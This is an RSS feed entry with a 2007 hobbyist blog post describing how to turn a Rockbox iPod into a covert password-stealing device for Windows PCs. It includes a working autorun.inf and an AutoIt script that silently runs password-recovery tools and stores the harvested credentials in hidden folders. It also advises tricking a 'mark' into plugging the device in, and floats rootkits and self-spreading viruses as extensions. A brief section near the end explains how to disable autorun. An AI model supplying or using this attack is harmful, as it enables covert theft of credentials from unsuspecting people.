<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kalimat al-Mutafalsif &#187; iPod</title>
	<atom:link href="http://thesnarky.com/category/ipod/feed/" rel="self" type="application/rss+xml" />
	<link>http://thesnarky.com</link>
	<description>The Words of the One Who Calls Himself a Philosopher</description>
	<lastBuildDate>Tue, 26 Oct 2010 22:57:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>iHack &#8211; The Beginning</title>
		<link>http://thesnarky.com/2007/11/06/ihack-the-beginning/</link>
		<comments>http://thesnarky.com/2007/11/06/ihack-the-beginning/#comments</comments>
		<pubDate>Tue, 06 Nov 2007 06:04:41 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[iPod]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/11/06/ihack-the-beginning/</guid>
		<description><![CDATA[A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works, but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.]]></description>
			<content:encoded><![CDATA[<p>A friend of mine passed on his used 60GB video iPod to me, which was very much appreciated as my old Sony MD-Walkman still works (God bless duct tape), but is hindered by all kinds of <a href="http://en.wikipedia.org/wiki/ATRAC">nasty DRM</a>. Nasty enough that I have been unable to even change any songs on there in the past three years as I lost the software. Nasty enough that nobody has bothered to reverse engineer it because even with documentation it's a bear. So I had been planning on getting something, and this was quite a nice graduation present. I immediately replaced the firmware with something a bit more "free", <a href="http://www.rockbox.org/">Rockbox</a>, and named her 'Katana'. Now I've got a nice flat file browser that lets me drop in almost any type of file I want. This doesn't stop at music and videos, I can also read text files, view pictures, etc. Naturally, that's not enough for me *wicked grin*. Read on to see some fun hacks that can be had with your iPod.<br />
<span id="more-180"></span><br />
<strong>iHack</strong><br />
Now, you hopefully have gleaned from above that an iPod (and basically any media player) is just a hard drive that looks good. Shove some proprietary firmware on there, ask $300 and all of a sudden that <a href="http://www.rapidrepair.com/Merchant2/merchant.mvc?Screen=PROD&Product_Code=1616-iPod_Hard_Drive_Disk_MK6008GAH&Category_Code=">60GB laptop hard drive</a> just doubled or tripled in cost. What you end up buying is essentially a large thumb drive, or small external hard drive, depending on how you look at it, which means we can use it as such. This hack comes from the Spring '06 issue of 2600, though that article had some errors which I've addressed, and some parts (such as autorun) which were just completely left out. </p>
<p>In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course, I'm targeting Windows in this; if you want to attack Macs or Linux, you just need to improvise a tad more.)</p>
<p><strong>Setup</strong><br />
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:</p>
<blockquote><p>
[autorun]<br />
shellexecute=ipod.exe<br />
icon=ipod.ico</p></blockquote>
<p>What the above does is declare that it's the autorun file, set a custom icon for the iPod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab <a href="http://www.autoitscript.com/autoit3/">AutoIt</a>. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by <a href="http://www.nirsoft.net/utils/index.html">Nirsoft</a>, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacking\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder. </p>
<p>The icon I picked (since this is an iPod) was the following:<br />
<img src="http://thesnarky.com/html/pictures/ipod/ipod.ico" alt="" /></p>
<p>The exe we're going to create is made with the following AutoIt script, which I won't go into detail on as it's fairly straightforward. A nicely formatted version of the file is found <a href="http://thesnarky.com/html/pictures/ipod/ipod.au3">here</a>.</p>
<pre>
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'
Dim $FileName = "all.log"
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)
sleep(3000)
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)
sleep(1000)
</pre>
<p>Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now; to check, double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not, go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?</p>
<p><strong>Execution</strong><br />
Now that we have a working autorun.inf and ipod.exe, it's as simple as unplugging your media device, then plugging it back in. Thankfully on Windows XP only CDs are allowed to run autorun with no user intervention, so we need to click on the media device; however, on older versions this stick will run itself. This is where offers of music work wonders. If a business executive will give out a <a href="http://news.bbc.co.uk/1/hi/technology/3639679.stm">password for a chocolate bar</a>, how many college students will let you open your iPod to give them free music? The first time you double click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?</p>
<p><strong>Expanding the Hack</strong><br />
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:</p>
<blockquote><p>
[autorun]<br />
shellexecute=http://www.stop-phishing.com<br />
icon=ipod.ico
</p></blockquote>
<p>I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to. </p>
<p>On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses; anything that can be done by a Windows executable and 60GB of space is possible here.</p>
<p><strong>Defense</strong><br />
I was remiss last night in posting this without a defense section. The easiest way to prevent it from Autoplaying is to hold shift while inserting any media. This goes for CDs or USB sticks (again on XP you only have to worry about CDs or U3 cruzers). If that fails, a handy trick can be found <a href="http://blogs.developerfusion.com/blogs/thushan/archive/2007/05/06/3066.aspx">here</a> to disable autorun in Windows. To quote Thushan Fernando:</p>
<ol>
<li>Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.</li>
<li>Go to 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'</li>
<li>When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.</li>
</ol>
<p>This option turns off autorun.inf from ever running and I highly recommend it.</p>
<p><strong>Research</strong><br />
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.</p>
<p>I hope to keep playing around with the iPod as a platform for hacking as it is so commonplace on a college campus. My ultimate goal is probably getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lie about.</p>
<p>And the best part of all this? You can perform the attack while listening to your favorite tunes!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/11/06/ihack-the-beginning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

